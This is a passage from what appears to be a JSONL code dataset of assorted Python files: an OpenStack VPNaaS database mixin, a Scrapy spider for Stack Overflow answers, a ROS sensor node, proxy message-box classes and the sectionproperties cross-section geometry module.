vpnservice_id=vpnservice_id).first()\n if vpnservice:\n raise vpnaas.VPNServiceInUse(vpnservice_id=vpnservice_id)\n vpns_db = self._get_resource(context, VPNService, vpnservice_id)\n self.assert_update_allowed(vpns_db)\n if vpns:\n vpns_db.update(vpns)\n return self._make_vpnservice_dict(vpns_db)\n\n def delete_vpnservice(self, context, vpnservice_id):\n with context.session.begin(subtransactions=True):\n if context.session.query(IPsecSiteConnection).filter_by(\n vpnservice_id=vpnservice_id\n ).first():\n raise vpnaas.VPNServiceInUse(vpnservice_id=vpnservice_id)\n vpns_db = self._get_resource(context, VPNService, vpnservice_id)\n context.session.delete(vpns_db)\n\n def _get_vpnservice(self, context, vpnservice_id):\n return self._get_resource(context, VPNService, vpnservice_id)\n\n def get_vpnservice(self, context, vpnservice_id, fields=None):\n vpns_db = 
self._get_resource(context, VPNService, vpnservice_id)\n return self._make_vpnservice_dict(vpns_db, fields)\n\n def get_vpnservices(self, context, filters=None, fields=None):\n return self._get_collection(context, VPNService,\n self._make_vpnservice_dict,\n filters=filters, fields=fields)\n\n\nclass VPNPluginRpcDbMixin():\n def _get_agent_hosting_vpn_services(self, context, host):\n\n plugin = manager.NeutronManager.get_plugin()\n agent = plugin._get_agent_by_type_and_host(\n context, q_constants.AGENT_TYPE_L3, host)\n if not agent.admin_state_up:\n return []\n query = context.session.query(VPNService)\n query = query.join(IPsecSiteConnection)\n query = query.join(IKEPolicy)\n query = query.join(IPsecPolicy)\n query = query.join(IPsecPeerCidr)\n query = query.join(agent_db.RouterL3AgentBinding,\n agent_db.RouterL3AgentBinding.router_id ==\n VPNService.router_id)\n query = query.filter(\n agent_db.RouterL3AgentBinding.l3_agent_id == agent.id)\n return query\n\n def update_status_on_host(self, context, host, active_services):\n with context.session.begin(subtransactions=True):\n vpnservices = self._get_agent_hosting_vpn_services(\n context, host)\n for vpnservice in vpnservices:\n if vpnservice.id in active_services:\n if vpnservice.status != constants.ACTIVE:\n vpnservice.status = constants.ACTIVE\n else:\n if vpnservice.status != constants.ERROR:\n vpnservice.status = constants.ERROR\n"} {"ext": "py", "sha": "1a309b0dbd6724579412ec2288ca3428dd5cc8ff", "content": "from django.apps import AppConfig\n\nclass HomepageConfig(AppConfig):\n default_auto_field = 'django.db.models.BigAutoField'\n name = 'HomePage'\n"} {"ext": "py", "sha": "1a309c0bf5e3492325e1877ea80da1d70cb95bad", "content": "#!/usr/bin/env python\nimport ads1256\nimport time\nimport rospy\nfrom std_msgs.msg import Float32\n\ndef ReadValues():\n\trate = 25 # Frequency in Hz\n\t\n\tads1256.start(\"1\",str(rate))\n\tpub = rospy.Publisher('/sen_4/ResVal', Float32, tcp_nodelay=False, queue_size=1)\n\trospy.init_node('Rheostat',anonymous=True)\n\trate=rospy.Rate(10)\n\twhile not rospy.is_shutdown():\n\t\tabsoluteValue = ads1256.read_channel(0)\n\t\tvoltage = ((absoluteValue*100)/167.0)/1000000.0\n\t\trospy.loginfo(voltage)\n\t\tpub.publish(voltage)\n\t\trate.sleep()\n\tads1256.stop()\n\t\nif __name__== '__main__':\n\ttry:\n\t\tReadValues()\n\texcept rospy.ROSInterruptException:\n\t\tpass\n"} {"ext": "py", "sha": "1a309c4b9d856791dc2b8413bfabe6d8af9e92b0", "content": "from scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors.sgml import SgmlLinkExtractor\nfrom scrapy.selector import HtmlXPathSelector\n\n# from nypbot.utils import normalizeFriendlyDate\n\n\nfrom dateutil.parser import parse\n\n\nimport pymysql.cursors\n\n\n\nanswers = open('answers.csv', 'a')\n\nclass AcceptedAnswerSpider(CrawlSpider):\n name = \"acceptedanswer\"\n allowed_domains = [\"stackoverflow.com\"]\n start_urls = [\n \"http://stackoverflow.com/search?q=regular+expression\"\n ]\n rules = (\n # Extract links matching 'garage-sales-18/.*html' (but not matching 'subsection.php')\n # and follow links from them (since no callback means follow=True by default).\n Rule(SgmlLinkExtractor(allow=('questions/[0-9]+/.*', )), callback='parse_item', follow=True),\n\n )\n\n\n \n def insert_item(self,item):\n connection = pymysql.connect(host='localhost',\n user='root',\n password='root',\n db='stackoverflow',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n\n try:\n with connection.cursor() as cursor:\n # Create a new record\n\t\tsql = \"INSERT 
INTO `acceptedanswer` (`url`, `pre`, `time_posted`, `author`, `vote`) VALUES (%s, %s, %s, %s, %s)\"\n cursor.execute(sql, (item['url'], item['pre_text'], item['time_posted'], item['author'], item['vote']))\n\n # connection is not autocommit by default. So you must commit to save\n # your changes.\n connection.commit()\n\n finally:\n connection.close()\n return\n \n \"\"\"\n When writing crawl spider rules, avoid using parse as callback, since the CrawlSpider uses the parse method itself to implement its logic. So if you override the parse method, the crawl spider will no longer work.\n \"\"\"\n\n def parse_item(self, response):\n global answers\n hxs = HtmlXPathSelector(response)\n posts = hxs.select(\"//div[@id='answers']/div[@class='answer accepted-answer']\")\n items = []\n\n\n for post in posts:\n # print(post)\n item = {}\n\t item['url'] = response.url\n item['pre_text'] = ''.join(post.select(\".//div[@class='post-text']//pre//text()\").extract())\n item['time_posted'] = parse(post.select(\".//div[@class='user-action-time']//span/text()\").extract()[0])\n\t item['author']= ''.join(post.select(\".//div[@class='user-details']//a/text()\").extract())\n\t item['vote']=''.join(post.select(\".//div[@class='vote']//span[@class='vote-count-post ' or @class='vote-count-post high-scored-post']/text()\").extract())\n\n\n\n self.insert_item(item)\n items.append(item)\n # self.insert_posts(items)\n #for item in items:\n # print >> answers, \"%s,'%s'\\n\" % (item['url'], item['pre_text'])\n return items\n\n\n\n\n\n\n\n\n\n\n"} {"ext": "py", "sha": "1a309d590d3f84ab72befcb77bab4171cb27c91e", "content": "from .preprocess import *\nfrom .toolkit import *\n\n\nname = 'xshinnosuke-utils'\n"} {"ext": "py", "sha": "1a309e3b08aa0399280cf8acd9dcc3ad6a979bc9", "content": "\"\"\"\nUtility functions used in the logistic regression classifier.\n\n@copyright: The Broad Institute of MIT and Harvard 2015\n\"\"\"\n\nimport numpy as np\n\ndef sigmoid(v):\n return 1 / (1 + np.exp(-v))\n\n\"\"\"Computes a prediction (in the form of probabilities) for the given data vector\n\"\"\"\ndef predict(x, theta):\n p = sigmoid(np.dot(x, theta))\n return np.array([p])\n\n\"\"\"Return a function that gives a prediction from a design matrix row\n\"\"\"\ndef gen_predictor(params_filename=\"./models/test/lreg-params\"):\n with open(params_filename, \"rb\") as pfile:\n lines = pfile.readlines()\n N = len(lines)\n theta = np.ones(N)\n i = 0\n for line in lines:\n theta[i] = float(line.strip().split(' ')[1])\n i = i + 1\n\n def predictor(X):\n scores = []\n for i in range(0, len(X)):\n scores.extend(predict(X[i,:], theta))\n return scores\n return predictor\n"} {"ext": "py", "sha": "1a309e67741766cdb11d02c91dcac357612e8e59", "content": "# encoding: utf-8\n\"\"\"\nmessagebox.py\n\nCreated by David Farrar on 2014-06-10 (or earlier).\nCopyright (c) 2011-2013 Exa Networks. 
All rights reserved.\n\"\"\"\n\nfrom exaproxy.util.messagebox import MessageBox\nfrom exaproxy.util.control import ControlBox\n\nclass ProxyToRedirectorMessageBox:\n\tdef __init__ (self, pid, pipe_in, pipe_out, control_in, control_out):\n\t\tself.pid = pid\n\t\tself.box = MessageBox(pipe_in, pipe_out)\n\t\tself.control = ControlBox(control_in, control_out)\n\n\tdef close (self):\n\t\treturn self.box.close()\n\n\tdef sendRequest (self, client_id, peer, request, subrequest, source):\n\t\tmessage = client_id, peer, request, subrequest, source\n\t\treturn self.box.put(message)\n\n\tdef getDecision (self):\n\t\tmessage = self.box.get()\n\t\tif message is not None:\n\t\t\tclient_id, command, decision = message\n\n\t\telse:\n\t\t\tclient_id, command, decision = None, None, None\n\n\t\treturn client_id, command, decision\n\n\tdef stop (self):\n\t\tself.control.send('STOP')\n\t\treturn self.control.wait_stop()\n\n\tdef respawn (self):\n\t\tself.control.send('RESPAWN')\n\n\tdef decreaseSpawnLimit (self, count=1):\n\t\tself.control.send('DECREASE', count)\n\n\tdef increaseSpawnLimit (self, count=1):\n\t\tself.control.send('INCREASE', count)\n\n\tdef getStats (self):\n\t\tidentifier = self.control.send('STATS')\n\t\treturn self.control.receive(identifier)\n\n\n\nclass RedirectorToProxyMessageBox:\n\tdef __init__ (self, pipe_in, pipe_out):\n\t\tself.box = MessageBox(pipe_in, pipe_out)\n\n\tdef close (self):\n\t\treturn self.box.close()\n\n\tdef isClosed (self):\n\t\treturn self.box.pipe_in.closed\n\n\tdef getRequest (self):\n\t\treturn self.box.get()\n\n\tdef sendResponse (self, client_id, command, decision):\n\t\tmessage = client_id, command, decision\n\t\treturn self.box.put(message)\n"} {"ext": "py", "sha": "1a309f1dd4064d85705312705c4bda4ad271ebcb", "content": "import os\nimport pytest\n\n\n@pytest.fixture(autouse=True, scope='function')\ndef setup():\n os.environ.pop('PYPINYIN_NO_PHRASES', None)\n os.environ.pop('PYPINYIN_NO_DICT_COPY', None)\n try:\n yield\n finally:\n os.environ.pop('PYPINYIN_NO_PHRASES', None)\n os.environ.pop('PYPINYIN_NO_DICT_COPY', None)\n"} {"ext": "py", "sha": "1a30a10b822bc458422e76b0e320768758d78dd3", "content": "import numpy as np\nimport matplotlib.pyplot as plt\nimport sectionproperties.pre.pre as pre\nimport sectionproperties.post.post as post\n\n\nclass Geometry:\n \"\"\"Parent class for a cross-section geometry input.\n\n Provides an interface for the user to specify the geometry defining a cross-section. A method\n is provided for generating a triangular mesh, for translating the cross-section by *(x, y)* and\n for plotting the geometry.\n\n :cvar points: List of points *(x, y)* defining the vertices of the cross-section\n :vartype points: list[list[float, float]]\n :cvar facets: List of point index pairs *(p1, p2)* defining the edges of the cross-section\n :vartype facets: list[list[int, int]]\n :cvar holes: List of points *(x, y)* defining the locations of holes within the cross-section.\n If there are no holes, provide an empty list [].\n :vartype holes: list[list[float, float]]\n :cvar control_points: A list of points *(x, y)* that define different regions of the\n cross-section. 
A control point is an arbitrary point within a region enclosed by facets.\n :vartype control_points: list[list[float, float]]\n :cvar shift: Vector that shifts the cross-section by *(x, y)*\n :vartype shift: list[float, float]\n :cvar perimeter: List of facet indices defining the perimeter of the cross-section\n :vartype perimeter: list[int]\n \"\"\"\n\n def __init__(self, control_points, shift):\n \"\"\"Inits the Geometry class.\"\"\"\n\n self.control_points = control_points\n self.shift = shift\n self.points = []\n self.facets = []\n self.holes = []\n self.perimeter = []\n\n def create_mesh(self, mesh_sizes):\n \"\"\"Creates a quadratic triangular mesh from the Geometry object.\n\n :param mesh_sizes: A list of maximum element areas corresponding to each region within the\n cross-section geometry.\n :type mesh_size: list[float]\n\n :return: Object containing generated mesh data\n :rtype: :class:`meshpy.triangle.MeshInfo`\n\n :raises AssertionError: If the number of mesh sizes does not match the number of regions\n\n The following example creates a circular cross-section with a diameter of 50 with 64\n points, and generates a mesh with a maximum triangular area of 2.5::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.CircularSection(d=50, n=64)\n mesh = geometry.create_mesh(mesh_sizes=[2.5])\n\n .. figure:: ../images/sections/circle_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n str = \"Number of mesh_sizes ({0}), should match the number of regions ({1})\".format(\n len(mesh_sizes), len(self.control_points)\n )\n assert(len(mesh_sizes) == len(self.control_points)), str\n\n return pre.create_mesh(\n self.points, self.facets, self.holes, self.control_points, mesh_sizes)\n\n def shift_section(self):\n \"\"\"Shifts the cross-section parameters by the class variable vector *shift*.\"\"\"\n\n for point in self.points:\n point[0] += self.shift[0]\n point[1] += self.shift[1]\n\n for hole in self.holes:\n hole[0] += self.shift[0]\n hole[1] += self.shift[1]\n\n for cp in self.control_points:\n cp[0] += self.shift[0]\n cp[1] += self.shift[1]\n\n def rotate_section(self, angle, rot_point=None):\n \"\"\"Rotates the geometry and specified angle about a point. If the rotation point is not\n provided, rotates the section about the first control point in the list of control points\n of the :class:`~sectionproperties.pre.sections.Geometry` object.\n\n :param float angle: Angle (degrees) by which to rotate the section. 
A positive angle leads\n to a counter-clockwise rotation.\n :param rot_point: Point *(x, y)* about which to rotate the section\n :type rot_point: list[float, float]\n\n The following example rotates a 200UB25 section clockwise by 30 degrees::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.ISection(d=203, b=133, t_f=7.8, t_w=5.8, r=8.9, n_r=8)\n geometry.rotate_section(angle=-30)\n \"\"\"\n\n # convert angle to radians\n rot_phi = angle * np.pi / 180\n\n def get_r(pt1, pt2):\n \"\"\"Returns the distance between two points.\"\"\"\n\n return ((pt1[0] - pt2[0]) ** 2 + (pt1[1] - pt2[1]) ** 2) ** 0.5\n\n def get_phi(pt1, pt2):\n \"\"\"Returns the angle between two points.\"\"\"\n\n return np.arctan2(pt1[1] - pt2[1], pt1[0] - pt2[0])\n\n def rotate_point(pt, rot_point, rot_phi):\n \"\"\"Rotates a point given a rotation point and rotation angle.\"\"\"\n\n r = get_r(pt, rot_point)\n phi = get_phi(pt, rot_point)\n\n pt[0] = r * np.cos(phi + rot_phi) + rot_point[0]\n pt[1] = r * np.sin(phi + rot_phi) + rot_point[1]\n\n # use the first control point if no rotation point is specified\n if rot_point is None:\n rot_point = self.control_points[0]\n\n # rotate all the points\n for point in self.points:\n rotate_point(point, rot_point, rot_phi)\n\n # rotate all the holes\n for hole in self.holes:\n rotate_point(hole, rot_point, rot_phi)\n\n # rotate all the control points\n for cp in self.control_points:\n rotate_point(cp, rot_point, rot_phi)\n\n def mirror_section(self, axis='x', mirror_point=None):\n \"\"\"Mirrors the geometry about a point on either the x or y-axis. If no point is provided,\n mirrors the geometry about the first control point in the list of control points of the\n :class:`~sectionproperties.pre.sections.Geometry` object.\n\n :param string axis: Axis about which to mirror the geometry, *'x'* or *'y'*\n :param mirror_point: Point about which to mirror the geometry *(x, y)*\n :type mirror_point: list[float, float]\n\n The following example mirrors a 200PFC section about the y-axis and the point (0, 0)::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.PfcSection(d=200, b=75, t_f=12, t_w=6, r=12, n_r=8)\n geometry.mirror_section(axis='y', mirror_point=[0, 0])\n \"\"\"\n\n # use the first control point if no mirror point is specified\n if mirror_point is None:\n mirror_point = self.control_points[0]\n\n # select the axis to mirror\n if axis == 'x':\n i = 1\n elif axis == 'y':\n i = 0\n else:\n raise RuntimeError(\"Enter a valid axis: 'x' or 'y'\")\n\n # mirror all points\n for point in self.points:\n point[i] = 2 * mirror_point[i] - point[i]\n\n # mirror all holes\n for hole in self.holes:\n hole[i] = 2 * mirror_point[i] - hole[i]\n\n # mirror all control points\n for cp in self.control_points:\n cp[i] = 2 * mirror_point[i] - cp[i]\n\n def add_point(self, point):\n \"\"\"Adds a point to the geometry and returns the added point id.\n\n :param point: Location of the point\n :type point: list[float, float]\n :return: Point id\n :rtype: int\n \"\"\"\n\n self.points.append(point)\n return len(self.points) - 1\n\n def add_facet(self, facet):\n \"\"\"Adds a facet to the geometry and returns the added facet id.\n\n :param facet: Point indices of the facet\n :type facet: list[float, float]\n :return: Facet id\n :rtype: int\n \"\"\"\n\n self.facets.append(facet)\n return len(self.facets) - 1\n\n def add_hole(self, hole):\n \"\"\"Adds a hole location to the geometry and returns the added hole id.\n\n :param hole: Location of the hole\n :type 
hole: list[float, float]\n :return: Hole id\n :rtype: int\n \"\"\"\n\n self.holes.append(hole)\n return len(self.holes) - 1\n\n def add_control_point(self, control_point):\n \"\"\"Adds a control point to the geometry and returns the added control\n point id.\n\n :param hole: Location of the control point\n :type hole: list[float, float]\n :return: Control point id\n :rtype: int\n \"\"\"\n\n self.control_points.append(control_point)\n return len(self.control_points) - 1\n\n def clean_geometry(self, verbose=False):\n \"\"\"Peforms a full clean on the geometry.\n\n :param bool verbose: If set to true, information related to the geometry cleaning process\n is printed to the terminal.\n\n .. note:: Cleaning the geometry is always recommended when creating a merged section,\n which may result in overlapping or intersecting facets, or duplicate nodes.\n \"\"\"\n\n self = pre.GeometryCleaner(self, verbose).clean_geometry()\n\n def plot_geometry(self, ax=None, pause=True, labels=False, perimeter=False):\n \"\"\"Plots the geometry defined by the input section. If no axes object is supplied a new\n figure and axis is created.\n\n :param ax: Axes object on which the mesh is plotted\n :type ax: :class:`matplotlib.axes.Axes`\n :param bool pause: If set to true, the figure pauses the script until the window is closed.\n If set to false, the script continues immediately after the window is rendered.\n :param bool labels: If set to true, node and facet labels are displayed\n :param bool perimeter: If set to true, boldens the perimeter of the cross-section\n\n :return: Matplotlib figure and axes objects (fig, ax)\n :rtype: (:class:`matplotlib.figure.Figure`, :class:`matplotlib.axes`)\n\n The following example creates a CHS discretised with 64 points, with a diameter of 48 and\n thickness of 3.2, and plots the geometry::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.Chs(d=48, t=3.2, n=64)\n geometry.plot_geometry()\n\n .. 
figure:: ../images/sections/chs_geometry.png\n :align: center\n :scale: 75 %\n\n Geometry generated by the above example.\n \"\"\"\n\n # if no axes object is supplied, create and setup the plot\n if ax is None:\n ax_supplied = False\n (fig, ax) = plt.subplots()\n post.setup_plot(ax, pause)\n else:\n ax_supplied = True\n\n for (i, f) in enumerate(self.facets):\n if perimeter:\n if i in self.perimeter:\n linewidth = 3\n else:\n linewidth = 1.5\n else:\n linewidth = 1.5\n\n # plot the points and facets\n if i == 0:\n ax.plot([self.points[f[0]][0], self.points[f[1]][0]],\n [self.points[f[0]][1], self.points[f[1]][1]],\n 'ko-', markersize=2, linewidth=linewidth, label='Points & Facets')\n else:\n ax.plot([self.points[f[0]][0], self.points[f[1]][0]],\n [self.points[f[0]][1], self.points[f[1]][1]],\n 'ko-', markersize=2, linewidth=linewidth)\n\n for (i, h) in enumerate(self.holes):\n # plot the holes\n if i == 0:\n ax.plot(h[0], h[1], 'rx', markersize=5, label='Holes')\n else:\n ax.plot(h[0], h[1], 'rx', markersize=5)\n\n for (i, cp) in enumerate(self.control_points):\n # plot the control points\n if i == 0:\n ax.plot(cp[0], cp[1], 'bo', markersize=5,\n label='Control Points')\n else:\n ax.plot(cp[0], cp[1], 'bo', markersize=5)\n\n # display the legend\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n\n # display the labels\n if labels:\n # plot node labels\n for (i, pt) in enumerate(self.points):\n ax.annotate(str(i), xy=pt, color='r')\n\n # plot facet labels\n for (i, fct) in enumerate(self.facets):\n pt1 = self.points[fct[0]]\n pt2 = self.points[fct[1]]\n xy = [(pt1[0] + pt2[0]) / 2, (pt1[1] + pt2[1]) / 2]\n\n ax.annotate(str(i), xy=xy, color='b')\n\n # if no axes object is supplied, finish the plot\n if not ax_supplied:\n post.finish_plot(ax, pause, title='Cross-Section Geometry')\n return (fig, ax)\n\n def calculate_extents(self):\n \"\"\"Calculates the minimum and maximum x and y-values amongst the list of points.\n\n :return: Minimum and maximum x and y-values *(x_min, x_max, y_min, y_max)*\n :rtype: tuple(float, float, float, float)\n \"\"\"\n\n # loop through all points\n for (i, pt) in enumerate(self.points):\n x = pt[0]\n y = pt[1]\n\n # initialise min, max variables\n if i == 0:\n x_min = x\n x_max = x\n y_min = y\n y_max = y\n\n # update the mins and maxs where necessary\n x_min = min(x_min, x)\n x_max = max(x_max, x)\n y_min = min(y_min, y)\n y_max = max(y_max, y)\n\n return (x_min, x_max, y_min, y_max)\n\n def draw_radius(self, pt, r, theta, n, anti=True):\n \"\"\"Adds a quarter radius of points to the points list - centered at point *pt*, with radius\n *r*, starting at angle *theta*, with *n* points. 
If r = 0, adds pt only.\n\n :param pt: Centre of radius *(x,y)*\n :type pt: list[float, float]\n :param float r: Radius\n :param float theta: Initial angle\n :param int n: Number of points\n :param bool anti: Anticlockwise rotation?\n \"\"\"\n\n if r == 0:\n self.points.append(pt)\n return\n\n if anti:\n mult = 1\n else:\n mult = -1\n\n # calculate radius of points\n for i in range(n):\n # determine angle\n t = theta + mult * i * 1.0 / max(1, n - 1) * np.pi * 0.5\n\n x = pt[0] + r * np.cos(t)\n y = pt[1] + r * np.sin(t)\n self.points.append([x, y])\n\n def calculate_facet_length(self, facet):\n \"\"\"Calculates the length of the facet.\n\n :param facet: Point index pair *(p1, p2)* defining a facet\n :vartype facets: list[int, int]\n\n :return: Facet length\n :rtype: float\n \"\"\"\n\n # get facet points\n p1 = self.points[facet[0]]\n p2 = self.points[facet[1]]\n\n # calculate distance between two points\n return np.sqrt((p2[0] - p1[0]) ** 2 + (p2[1] - p1[1]) ** 2)\n\n def calculate_perimeter(self):\n \"\"\"Calculates the perimeter of the cross-section by summing the length of all facets in the\n ``perimeter`` class variable.\n\n :return: Cross-section perimeter, returns 0 if there is no perimeter defined\n :rtype: float\n \"\"\"\n\n # check to see if there are any facets in the perimeter variable\n if len(self.perimeter) == 0:\n return 0\n\n # initialise perimeter variable\n perimeter = 0\n\n # loop through all the facets along the perimeter\n for facet_idx in self.perimeter:\n perimeter += self.calculate_facet_length(self.facets[facet_idx])\n\n return perimeter\n\n\nclass CustomSection(Geometry):\n \"\"\"Constructs a cross-section from a list of points, facets, holes and a user specified control\n point.\n\n :param points: List of points *(x, y)* defining the vertices of the cross-section\n :type points: list[list[float, float]]\n :param facets: List of point index pairs *(p1, p2)* defining the edges of the cross-section\n :type facets: list[list[int, int]]\n :param holes: List of points *(x, y)* defining the locations of holes within the cross-section.\n If there are no holes, provide an empty list [].\n :type holes: list[list[float, float]]\n :param control_points: A list of points *(x, y)* that define different regions of the\n cross-section. A control point is an arbitrary point within a region enclosed by facets.\n :type control_points: list[list[float, float]]\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n :param perimeter: List of facet indices defining the perimeter of the cross-section\n :vartype perimeter: list[int]\n\n The following example creates a hollow trapezium with a base width of 100, top width of 50,\n height of 50 and a wall thickness of 10. A mesh is generated with a maximum triangular area of\n 2.0::\n\n import sectionproperties.pre.sections as sections\n\n points = [[0, 0], [100, 0], [75, 50], [25, 50], [15, 10], [85, 10], [70, 40], [30, 40]]\n facets = [[0, 1], [1, 2], [2, 3], [3, 0], [4, 5], [5, 6], [6, 7], [7, 4]]\n holes = [[50, 25]]\n control_points = [[5, 5]]\n perimeter = [0, 1, 2, 3]\n\n geometry = sections.CustomSection(\n points, facets, holes, control_points, perimeter=perimeter\n )\n mesh = geometry.create_mesh(mesh_sizes=[2.0])\n\n .. figure:: ../images/sections/custom_geometry.png\n :align: center\n :scale: 75 %\n\n Custom section geometry.\n\n .. 
figure:: ../images/sections/custom_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, points, facets, holes, control_points, shift=[0, 0], perimeter=[]):\n \"\"\"Inits the CustomSection class.\"\"\"\n\n super().__init__(control_points, shift)\n\n self.points = points\n self.facets = facets\n self.holes = holes\n self.perimeter = perimeter\n\n self.shift_section()\n\n\nclass RectangularSection(Geometry):\n \"\"\"Constructs a rectangular section with the bottom left corner at the origin *(0, 0)*, with\n depth *d* and width *b*.\n\n :param float d: Depth (y) of the rectangle\n :param float b: Width (x) of the rectangle\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a rectangular cross-section with a depth of 100 and width of 50,\n and generates a mesh with a maximum triangular area of 5::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.RectangularSection(d=100, b=50)\n mesh = geometry.create_mesh(mesh_sizes=[5])\n\n .. figure:: ../images/sections/rectangle_geometry.png\n :align: center\n :scale: 75 %\n\n Rectangular section geometry.\n\n .. figure:: ../images/sections/rectangle_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, b, shift=[0, 0]):\n \"\"\"Inits the RectangularSection class.\"\"\"\n\n # assign control point\n control_points = [[0.5 * b, 0.5 * d]]\n\n super().__init__(control_points, shift)\n\n # construct the points and facets\n self.points = [[0, 0], [b, 0], [b, d], [0, d]]\n self.facets = [[0, 1], [1, 2], [2, 3], [3, 0]]\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass CircularSection(Geometry):\n \"\"\"Constructs a solid circle centered at the origin *(0, 0)* with diameter *d* and using *n*\n points to construct the circle.\n\n :param float d: Diameter of the circle\n :param int n: Number of points discretising the circle\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a circular cross-section with a diameter of 50 with 64 points,\n and generates a mesh with a maximum triangular area of 2.5::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.CircularSection(d=50, n=64)\n mesh = geometry.create_mesh(mesh_sizes=[2.5])\n\n .. figure:: ../images/sections/circle_geometry.png\n :align: center\n :scale: 75 %\n\n Circular section geometry.\n\n .. 
figure:: ../images/sections/circle_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, n, shift=[0, 0]):\n \"\"\"Inits the CircularSection class.\"\"\"\n\n # assign control point\n control_points = [[0, 0]]\n\n super().__init__(control_points, shift)\n\n # loop through each point on the circle\n for i in range(n):\n # determine polar angle\n theta = i * 2 * np.pi * 1.0 / n\n\n # calculate location of the point\n x = 0.5 * d * np.cos(theta)\n y = 0.5 * d * np.sin(theta)\n\n # append the current point to the points list\n self.points.append([x, y])\n\n # if we are not at the last point\n if i != n - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the circle\n else:\n self.facets.append([i, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass Chs(Geometry):\n \"\"\"Constructs a circular hollow section centered at the origin *(0, 0)*, with diameter *d* and\n thickness *t*, using *n* points to construct the inner and outer circles.\n\n :param float d: Outer diameter of the CHS\n :param float t: Thickness of the CHS\n :param int n: Number of points discretising the inner and outer circles\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a CHS discretised with 64 points, with a diameter of 48 and\n thickness of 3.2, and generates a mesh with a maximum triangular area of 1.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.Chs(d=48, t=3.2, n=64)\n mesh = geometry.create_mesh(mesh_sizes=[1.0])\n\n .. figure:: ../images/sections/chs_geometry.png\n :align: center\n :scale: 75 %\n\n CHS geometry.\n\n .. figure:: ../images/sections/chs_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d, t, n, shift=[0, 0]):\n \"\"\"Inits the Chs class.\"\"\"\n\n # assign control point\n control_points = [[d * 0.5 - t * 0.5, 0]]\n\n super().__init__(control_points, shift)\n\n # specify a hole in the centre of the CHS\n self.holes = [[0, 0]]\n\n # loop through each point of the CHS\n for i in range(n):\n # determine polar angle\n theta = i * 2 * np.pi * 1.0 / n\n\n # calculate location of outer and inner points\n x_outer = 0.5 * d * np.cos(theta)\n y_outer = 0.5 * d * np.sin(theta)\n x_inner = (0.5 * d - t) * np.cos(theta)\n y_inner = (0.5 * d - t) * np.sin(theta)\n\n # append the current points to the points list\n self.points.append([x_outer, y_outer])\n self.points.append([x_inner, y_inner])\n\n # if we are not at the last point\n if i != n - 1:\n self.facets.append([i * 2, i * 2 + 2])\n self.facets.append([i * 2 + 1, i * 2 + 3])\n # if we are at the last point, complete the circle\n else:\n self.facets.append([i * 2, 0])\n self.facets.append([i * 2 + 1, 1])\n\n self.perimeter = list(range(0, len(self.facets), 2))\n\n self.shift_section()\n\n\nclass EllipticalSection(Geometry):\n \"\"\"Constructs a solid ellipse centered at the origin *(0, 0)* with vertical diameter *d_y* and\n horizontal diameter *d_x*, using *n* points to construct the ellipse.\n\n :param float d_y: Diameter of the ellipse in the y-dimension\n :param float d_x: Diameter of the ellipse in the x-dimension\n :param int n: Number of points discretising the ellipse\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates an elliptical cross-section with a vertical 
diameter of 25 and\n horizontal diameter of 50, with 40 points, and generates a mesh with a maximum triangular area\n of 1.0::\n\n import sectionproperties.pre.sections as sections\n\n geometry = sections.EllipticalSection(d_y=25, d_x=50, n=40)\n mesh = geometry.create_mesh(mesh_sizes=[1.0])\n\n .. figure:: ../images/sections/ellipse_geometry.png\n :align: center\n :scale: 75 %\n\n Elliptical section geometry.\n\n .. figure:: ../images/sections/ellipse_mesh.png\n :align: center\n :scale: 75 %\n\n Mesh generated from the above geometry.\n \"\"\"\n\n def __init__(self, d_y, d_x, n, shift=[0, 0]):\n \"\"\"Inits the EllipticalSection class.\"\"\"\n\n # assign control point centered at zero\n control_points = [[0, 0]]\n\n super().__init__(control_points, shift)\n\n # loop through each point on the ellipse\n for i in range(n):\n # determine polar angle\n theta = i * 2 * np.pi * 1.0 / n\n\n # calculate location of the point\n x = 0.5 * d_x * np.cos(theta)\n y = 0.5 * d_y * np.sin(theta)\n\n # append the current point to the points list\n self.points.append([x, y])\n\n # if we are not at the last point\n if i != n - 1:\n self.facets.append([i, i + 1])\n # if we are at the last point, complete the ellipse\n else:\n self.facets.append([i, 0])\n\n self.perimeter = list(range(len(self.facets)))\n\n self.shift_section()\n\n\nclass Ehs(Geometry):\n \"\"\"Constructs an elliptical hollow section centered at the origin *(0, 0)*, with outer vertical\n diameter *d_y*, outer horizontal diameter *d_x*, and thickness *t*, using *n* points to\n construct the inner and outer ellipses.\n\n :param float d_y: Diameter of the ellipse in the y-dimension\n :param float d_x: Diameter of the ellipse in the x-dimension\n :param float t: Thickness of the EHS\n :param int n: Number of points discretising the inner and outer ellipses\n :param shift: Vector that shifts the cross-section by *(x, y)*\n :type shift: list[float, float]\n\n The following example creates a EHS discretised with 30 points, with a outer vertical diameter\n of 25, outer horizontal diameter of 50, and thickness of 2.0, and generates a mesh with a\n maximum triangular area of 0.5::\n\n import 